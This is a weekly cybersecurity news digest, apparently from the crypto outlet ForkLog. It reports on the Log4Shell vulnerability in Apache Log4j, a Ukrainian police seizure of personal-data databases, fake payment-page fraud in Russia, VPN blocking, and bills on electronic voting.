Log4j vulnerability, sale of 300 million personal data records, and other cybersecurity events

We’ve gathered the week’s most important cybersecurity news.

“Cyberpandemic”: hackers mass-exploit the Log4j vulnerability. Experts call it the most serious bug in years

Researchers identified a critical vulnerability in the popular Java library Apache Log4j. It could potentially allow attackers to gain remote access to devices and servers, even without extensive technical skills. The vulnerability is named Log4Shell.

In the UK National Cyber Security Centre and the US Cybersecurity and Infrastructure Security Agency they describe the bug as potentially the most serious discovered in recent years. On the Common Vulnerability Scoring System (CVSS) the vulnerability scored 10 out of 10.

Log4j is used in the development of many systems, including Amazon, Apple iCloud, Cisco, Cloudflare, ElasticSearch, Red Hat, Steam, Tesla and Twitter. Therefore the scale of Log4Shell exploitation could be colossal.

According to Bloomberg, the first reports about the vulnerability appeared in late November. After a while the bug was discussed on WeChat, and hackers began exploiting Log4Shell. 

Earliest evidence we’ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC. That suggests it was in the wild at least 9 days before publicly disclosed. However, don’t see evidence of mass exploitation until after public disclosure.

— Matthew Prince 🌥 (@eastdakota) December 11, 2021

According to Netlab 360 researchers, attackers used the exploit to drop malware Mirai and Muhstik onto devices. With their help hackers deployed crypto miners, and used for conducting large-scale DDoS attacks or installation of Cobalt Strike beacons to locate vulnerable servers.

The Apache Software Foundation issued an emergency update. However, amid fixes new bugs surfaced, after which experts issued another update 2.16.0.

Nearly all Log4j versions, from 2.0-beta9 to 2.14.1, are vulnerable. The simplest and most effective defense against Log4Shell is to upgrade to the latest version of the library, experts say.

However, for now experts cannot fully assess the scale of the consequences from exploiting the vulnerability. Bitdefender has already identified ransomware exploiting Log4Shell, and Netlab stated that at least ten hacker groups are exploiting the bug. The vulnerability affected nearly half of corporate networks in Russia, writes «Коммерсантъ».

In Check Point Research they recorded more than 800,000 attacks on Log4Shell and the spread of new variants of the original exploit — there are over 60.

This is clearly one of the most serious vulnerabilities on the Internet in recent years. When we discussed the possibility of a cyberpandemic, this is exactly what we had in mind — rapidly spreading destructive attacks

— the experts said.

In Ukraine, sale of personal data databases containing information on 300 million people was halted

Ukrainian cyberpolice identified 51 suspects in distributing personal data of citizens of Ukraine, Europe and the USA.

During Operation “DATA” law enforcement seized about 100 databases containing data on 300 million people, over 90,000 GB. The information in them is current for 2020-2021 years.

The databases contained data on clients of banks and companies, information for logging into email, social networks, online stores and other.

Law enforcement also stopped the activity of one of the largest sites selling personal data, including full names, phone numbers and places of registration.

In Check Point Research we detailed the numbers.

Microsoft patched the vulnerability used by Emotet; Google fixed a zero-day vulnerability

Microsoft patched the vulnerability, exploited by the Emotet malware. It could be used in phishing campaigns targeting Windows users.

This week Google developers also rolled out a new Chrome version that fixes the zero-day vulnerability being exploited.

Fraudsters stole more than 3 billion rubles from Russians via fake payment systems

Group-IB experts told ForkLog about the fraudulent scheme using fake payment systems. The loss for Russian bank customers was estimated at 3.15 billion rubles.

According to specialists, criminals began forging pages for 3D Secure used to secure online payments.

The danger of using fake payment systems through such pages is that detection is difficult; they often display logos of Visa, MasterCard or MIR and do not raise buyers’ suspicion, Group-IB said.

“Lured by fraudulent advertising, spam, or onlineclassified ads, a customer visits a phishing page of an online store, marketplace or service. After selecting a product or service, the victim enters their card details into the fraudulent site’s payment form,” the experts explain.

The data ends up on a fraudulent server, from which payments are routed to bank P2P services with one of the criminals’ cards as the recipient.

Russian users performed over 11,000 payments daily via phishing pages, totaling 8.6 million rubles.

Lantern VPN uses a decentralized tool to bypass possible blocking in Russia

The Lantern VPN service, which could be blocked in Russia, has responded to the threat.

“In its unwarranted attempts to build a centrally controlled Internet, the Russian government is tightening the noose around the ability of Russians to use modern technology to exercise fundamental rights,” the statement reads.

Lantern said it is not surprised by Roskomnadzor’s interest in the service, “especially after recent news about aggressive Russian actions against the Tor network”.

The service has no intention of cooperating with Russian law enforcement or complying with content-filtering demands:

“Moreover, Lantern is built with a censorship-resistant decentralized content distribution tool that is currently available to Russian users on desktop and will appear on mobile devices this month”.

Recall that in early December Roskomnadzor addressed companies using VPN services Betternet, Lantern, X-VPN, Cloudflare WARP, Tachyon VPN and PrivateTunnel. The agency argues they help bypass restrictions, enabling access to information banned in Russia.

In the State Duma, bills were introduced on unified rules for remote voting and its abolition

In the State Duma they registered a bill on unified rules for remote electronic voting (DEG) for all regions and elections at various levels.

The head of the Central Election Commission, Ella Pamfilova, said that next year the number of regions where DEG will be used is planned to be expanded.

Meanwhile a group of CPRF deputies submitted to the State Duma a bill to repeal DEG for elections in Russia.

Also on ForkLog:

• Hackers drained hot wallets of the AscendEX exchange for more than $77 million.
• Unknown individuals hacked the Indian prime minister’s Twitter and announced Bitcoin’s legalization.
• The operator of a botnet for stealing bitcoins got four years in prison in the United States.
• Crystal Blockchain said that over 10 years the damage to crypto platforms and their users from criminals’ actions reached $12.1 billion.
• The BadgerDAO DeFi project team uncovered details of the hack for $121 million.
• Chainalysis said that rug pulls accounted for 37% of criminals’ income for 2021.
• Hackers hacked users’ wallets on the Vulcan Forged platform and moved tokens worth $100 million.
• Kaspersky Lab experts said that 47% of attacks in 2021 were ransomware programs.

What to read this weekend?

Almost a year ago news broke of an attack on US government systems, and then on many companies around the world via SolarWinds. In light of concerns about the Log4j vulnerability, we recall the hack that was described as one of the most sophisticated and largest in recent years.

Read ForkLog’s bitcoin news in our Telegram — crypto news, prices and analysis.